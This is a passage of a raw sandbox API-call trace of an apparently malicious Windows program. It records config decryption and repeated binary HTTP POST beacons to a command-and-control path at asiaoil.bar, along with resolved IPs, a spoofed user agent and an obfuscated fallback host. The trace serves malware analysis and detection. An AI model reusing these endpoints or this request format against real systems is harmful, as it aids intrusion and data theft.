(lpLibFileName="shlwapi") returned 0x77590000 [0310.819] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0310.820] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0310.820] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0310.821] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0310.821] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0310.822] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0310.822] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0310.822] GetProcessHeap () returned 0x740000 [0310.822] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdc8 [0310.822] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c1f0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be18*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2c8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0310.823] GetProcessHeap () returned 0x740000 [0310.823] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b640 [0310.823] socket (af=2, type=1, protocol=6) returned 0x2f4 [0310.824] connect (s=0x2f4, name=0x75c1f0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0310.855] FreeAddrInfoW (pAddrInfo=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c1f0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be18*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2c8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0310.855] GetProcessHeap () returned 0x740000 [0310.855] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75cdd0 [0310.855] GetProcessHeap () returned 0x740000 [0310.855] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0310.856] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0310.857] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0310.857] GetProcessHeap () returned 0x740000 [0310.857] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0310.857] GetProcessHeap () returned 0x740000 [0310.857] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0310.858] GetProcessHeap () returned 0x740000 [0310.858] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763e00 [0310.858] GetProcessHeap () returned 0x740000 [0310.858] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0310.858] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0310.859] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0310.859] GetProcessHeap () returned 0x740000 [0310.859] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0310.859] GetProcessHeap () returned 0x740000 [0310.860] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0310.860] send (s=0x2f4, buf=0x747928*, len=243, flags=0) returned 243 [0310.860] send (s=0x2f4, buf=0x761fd0*, len=159, flags=0) returned 159 [0310.860] GetProcessHeap () returned 0x740000 [0310.860] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0310.860] recv (in: s=0x2f4, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 565 [0310.976] GetProcessHeap () returned 0x740000 [0310.976] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0310.977] GetProcessHeap () returned 0x740000 [0310.977] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763e00 | out: hHeap=0x740000) returned 1 [0310.977] GetProcessHeap () returned 0x740000 [0310.977] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0310.977] GetProcessHeap () returned 0x740000 [0310.978] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75cdd0 | out: hHeap=0x740000) returned 1 [0310.978] closesocket (s=0x2f4) returned 0 [0310.978] GetProcessHeap () returned 0x740000 [0310.978] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b640 | out: hHeap=0x740000) returned 1 [0310.978] GetProcessHeap () returned 0x740000 [0310.978] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0310.979] GetProcessHeap () returned 0x740000 [0310.979] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763668 | out: hHeap=0x740000) returned 1 [0310.979] GetProcessHeap () returned 0x740000 [0310.979] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0310.979] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x4f4) returned 0x2f4 [0310.981] Sleep (dwMilliseconds=0xea60) [0310.986] GetProcessHeap () returned 0x740000 [0310.986] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763668 [0310.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.987] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0310.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.994] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75ce58) returned 1 [0311.001] GetProcessHeap () returned 0x740000 [0311.001] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758478 [0311.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.002] CryptImportKey (in: hProv=0x75ce58, pbData=0x758478, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0311.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.003] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0311.003] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.004] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0311.004] GetProcessHeap () returned 0x740000 [0311.004] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758478 | out: hHeap=0x740000) returned 1 [0311.005] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.006] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763668, pdwDataLen=0x19fcfc | out: pbData=0x763668, pdwDataLen=0x19fcfc) returned 1 [0311.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.007] CryptDestroyKey (hKey=0x74d768) returned 1 [0311.007] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.008] CryptReleaseContext (hProv=0x75ce58, dwFlags=0x0) returned 1 [0311.008] GetProcessHeap () returned 0x740000 [0311.008] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765ce8 [0311.008] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0311.009] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0311.009] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0311.010] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0311.010] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0311.010] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0311.011] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0311.011] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0311.011] GetProcessHeap () returned 0x740000 [0311.011] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bf80 [0311.011] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0311.012] GetProcessHeap () returned 0x740000 [0311.012] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bf80 | out: hHeap=0x740000) returned 1 [0311.012] GetProcessHeap () returned 0x740000 [0311.013] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765ce8 | out: hHeap=0x740000) returned 1 [0311.013] GetProcessHeap () returned 0x740000 [0311.013] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763668 | out: hHeap=0x740000) returned 1 [0311.025] GetProcessHeap () returned 0x740000 [0311.025] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763db8 [0311.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.026] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0311.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.033] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75cdd0) returned 1 [0311.040] GetProcessHeap () returned 0x740000 [0311.040] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0311.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.041] CryptImportKey (in: hProv=0x75cdd0, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0311.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.042] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0311.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.043] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0311.043] GetProcessHeap () returned 0x740000 [0311.043] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0311.044] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.044] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763db8, pdwDataLen=0x19fcfc | out: pbData=0x763db8, pdwDataLen=0x19fcfc) returned 1 [0311.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.045] CryptDestroyKey (hKey=0x74d768) returned 1 [0311.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.046] CryptReleaseContext (hProv=0x75cdd0, dwFlags=0x0) returned 1 [0311.046] GetProcessHeap () returned 0x740000 [0311.046] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766588 [0311.047] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0311.047] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0311.048] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0311.048] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0311.049] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0311.049] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0311.050] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0311.050] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0311.050] GetProcessHeap () returned 0x740000 [0311.050] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75be68 [0311.050] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bf58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2f8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0311.051] GetProcessHeap () returned 0x740000 [0311.051] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b6a0 [0311.051] socket (af=2, type=1, protocol=6) returned 0x2f8 [0311.052] connect (s=0x2f8, name=0x75c2f8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0311.080] FreeAddrInfoW (pAddrInfo=0x75bf58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2f8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0311.080] GetProcessHeap () returned 0x740000 [0311.080] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d8f8 [0311.080] GetProcessHeap () returned 0x740000 [0311.080] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0311.081] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0311.082] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0311.082] GetProcessHeap () returned 0x740000 [0311.082] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0311.082] GetProcessHeap () returned 0x740000 [0311.082] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0311.083] GetProcessHeap () returned 0x740000 [0311.083] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763c98 [0311.083] GetProcessHeap () returned 0x740000 [0311.083] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0311.084] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0311.085] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0311.085] GetProcessHeap () returned 0x740000 [0311.085] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0311.085] GetProcessHeap () returned 0x740000 [0311.086] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0311.086] send (s=0x2f8, buf=0x747928*, len=243, flags=0) returned 243 [0311.086] send (s=0x2f8, buf=0x761fd0*, len=159, flags=0) returned 159 [0311.086] GetProcessHeap () returned 0x740000 [0311.087] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0311.087] recv (in: s=0x2f8, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 571 [0311.212] GetProcessHeap () returned 0x740000 [0311.212] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0311.212] GetProcessHeap () returned 0x740000 [0311.213] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763c98 | out: hHeap=0x740000) returned 1 [0311.213] GetProcessHeap () returned 0x740000 [0311.213] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0311.213] GetProcessHeap () returned 0x740000 [0311.214] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d8f8 | out: hHeap=0x740000) returned 1 [0311.214] closesocket (s=0x2f8) returned 0 [0311.214] GetProcessHeap () returned 0x740000 [0311.214] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6a0 | out: hHeap=0x740000) returned 1 [0311.214] GetProcessHeap () returned 0x740000 [0311.215] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766588 | out: hHeap=0x740000) returned 1 [0311.215] GetProcessHeap () returned 0x740000 [0311.215] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763db8 | out: hHeap=0x740000) returned 1 [0311.215] GetProcessHeap () returned 0x740000 [0311.215] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75be68 | out: hHeap=0x740000) returned 1 [0311.216] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x4e4) returned 0x2f8 [0311.217] Sleep (dwMilliseconds=0xea60) [0311.219] GetProcessHeap () returned 0x740000 [0311.219] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763b30 [0311.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.220] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0311.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.226] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75caa0) returned 1 [0311.234] GetProcessHeap () returned 0x740000 [0311.234] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0311.235] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.235] CryptImportKey (in: hProv=0x75caa0, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d9e8) returned 1 [0311.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.236] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0311.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.237] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0311.237] GetProcessHeap () returned 0x740000 [0311.238] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0311.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.239] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763b30, pdwDataLen=0x19fcfc | out: pbData=0x763b30, pdwDataLen=0x19fcfc) returned 1 [0311.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.240] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0311.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.241] CryptReleaseContext (hProv=0x75caa0, dwFlags=0x0) returned 1 [0311.241] GetProcessHeap () returned 0x740000 [0311.241] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766138 [0311.242] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0311.242] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0311.243] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0311.243] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0311.243] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0311.244] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0311.244] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0311.245] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0311.245] GetProcessHeap () returned 0x740000 [0311.245] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdc8 [0311.245] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0311.245] GetProcessHeap () returned 0x740000 [0311.245] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0311.245] GetProcessHeap () returned 0x740000 [0311.246] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766138 | out: hHeap=0x740000) returned 1 [0311.246] GetProcessHeap () returned 0x740000 [0311.246] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763b30 | out: hHeap=0x740000) returned 1 [0311.246] GetProcessHeap () returned 0x740000 [0311.246] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763b30 [0311.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.298] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0311.304] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.304] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d210) returned 1 [0311.311] GetProcessHeap () returned 0x740000 [0311.311] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x7584a8 [0311.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.312] CryptImportKey (in: hProv=0x75d210, pbData=0x7584a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d9e8) returned 1 [0311.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.314] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0311.314] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.315] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0311.315] GetProcessHeap () returned 0x740000 [0311.315] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7584a8 | out: hHeap=0x740000) returned 1 [0311.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.316] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763b30, pdwDataLen=0x19fcfc | out: pbData=0x763b30, pdwDataLen=0x19fcfc) returned 1 [0311.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.326] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0311.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.327] CryptReleaseContext (hProv=0x75d210, dwFlags=0x0) returned 1 [0311.327] GetProcessHeap () returned 0x740000 [0311.327] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765898 [0311.330] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0311.330] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0311.331] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0311.332] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0311.332] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0311.333] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0311.333] 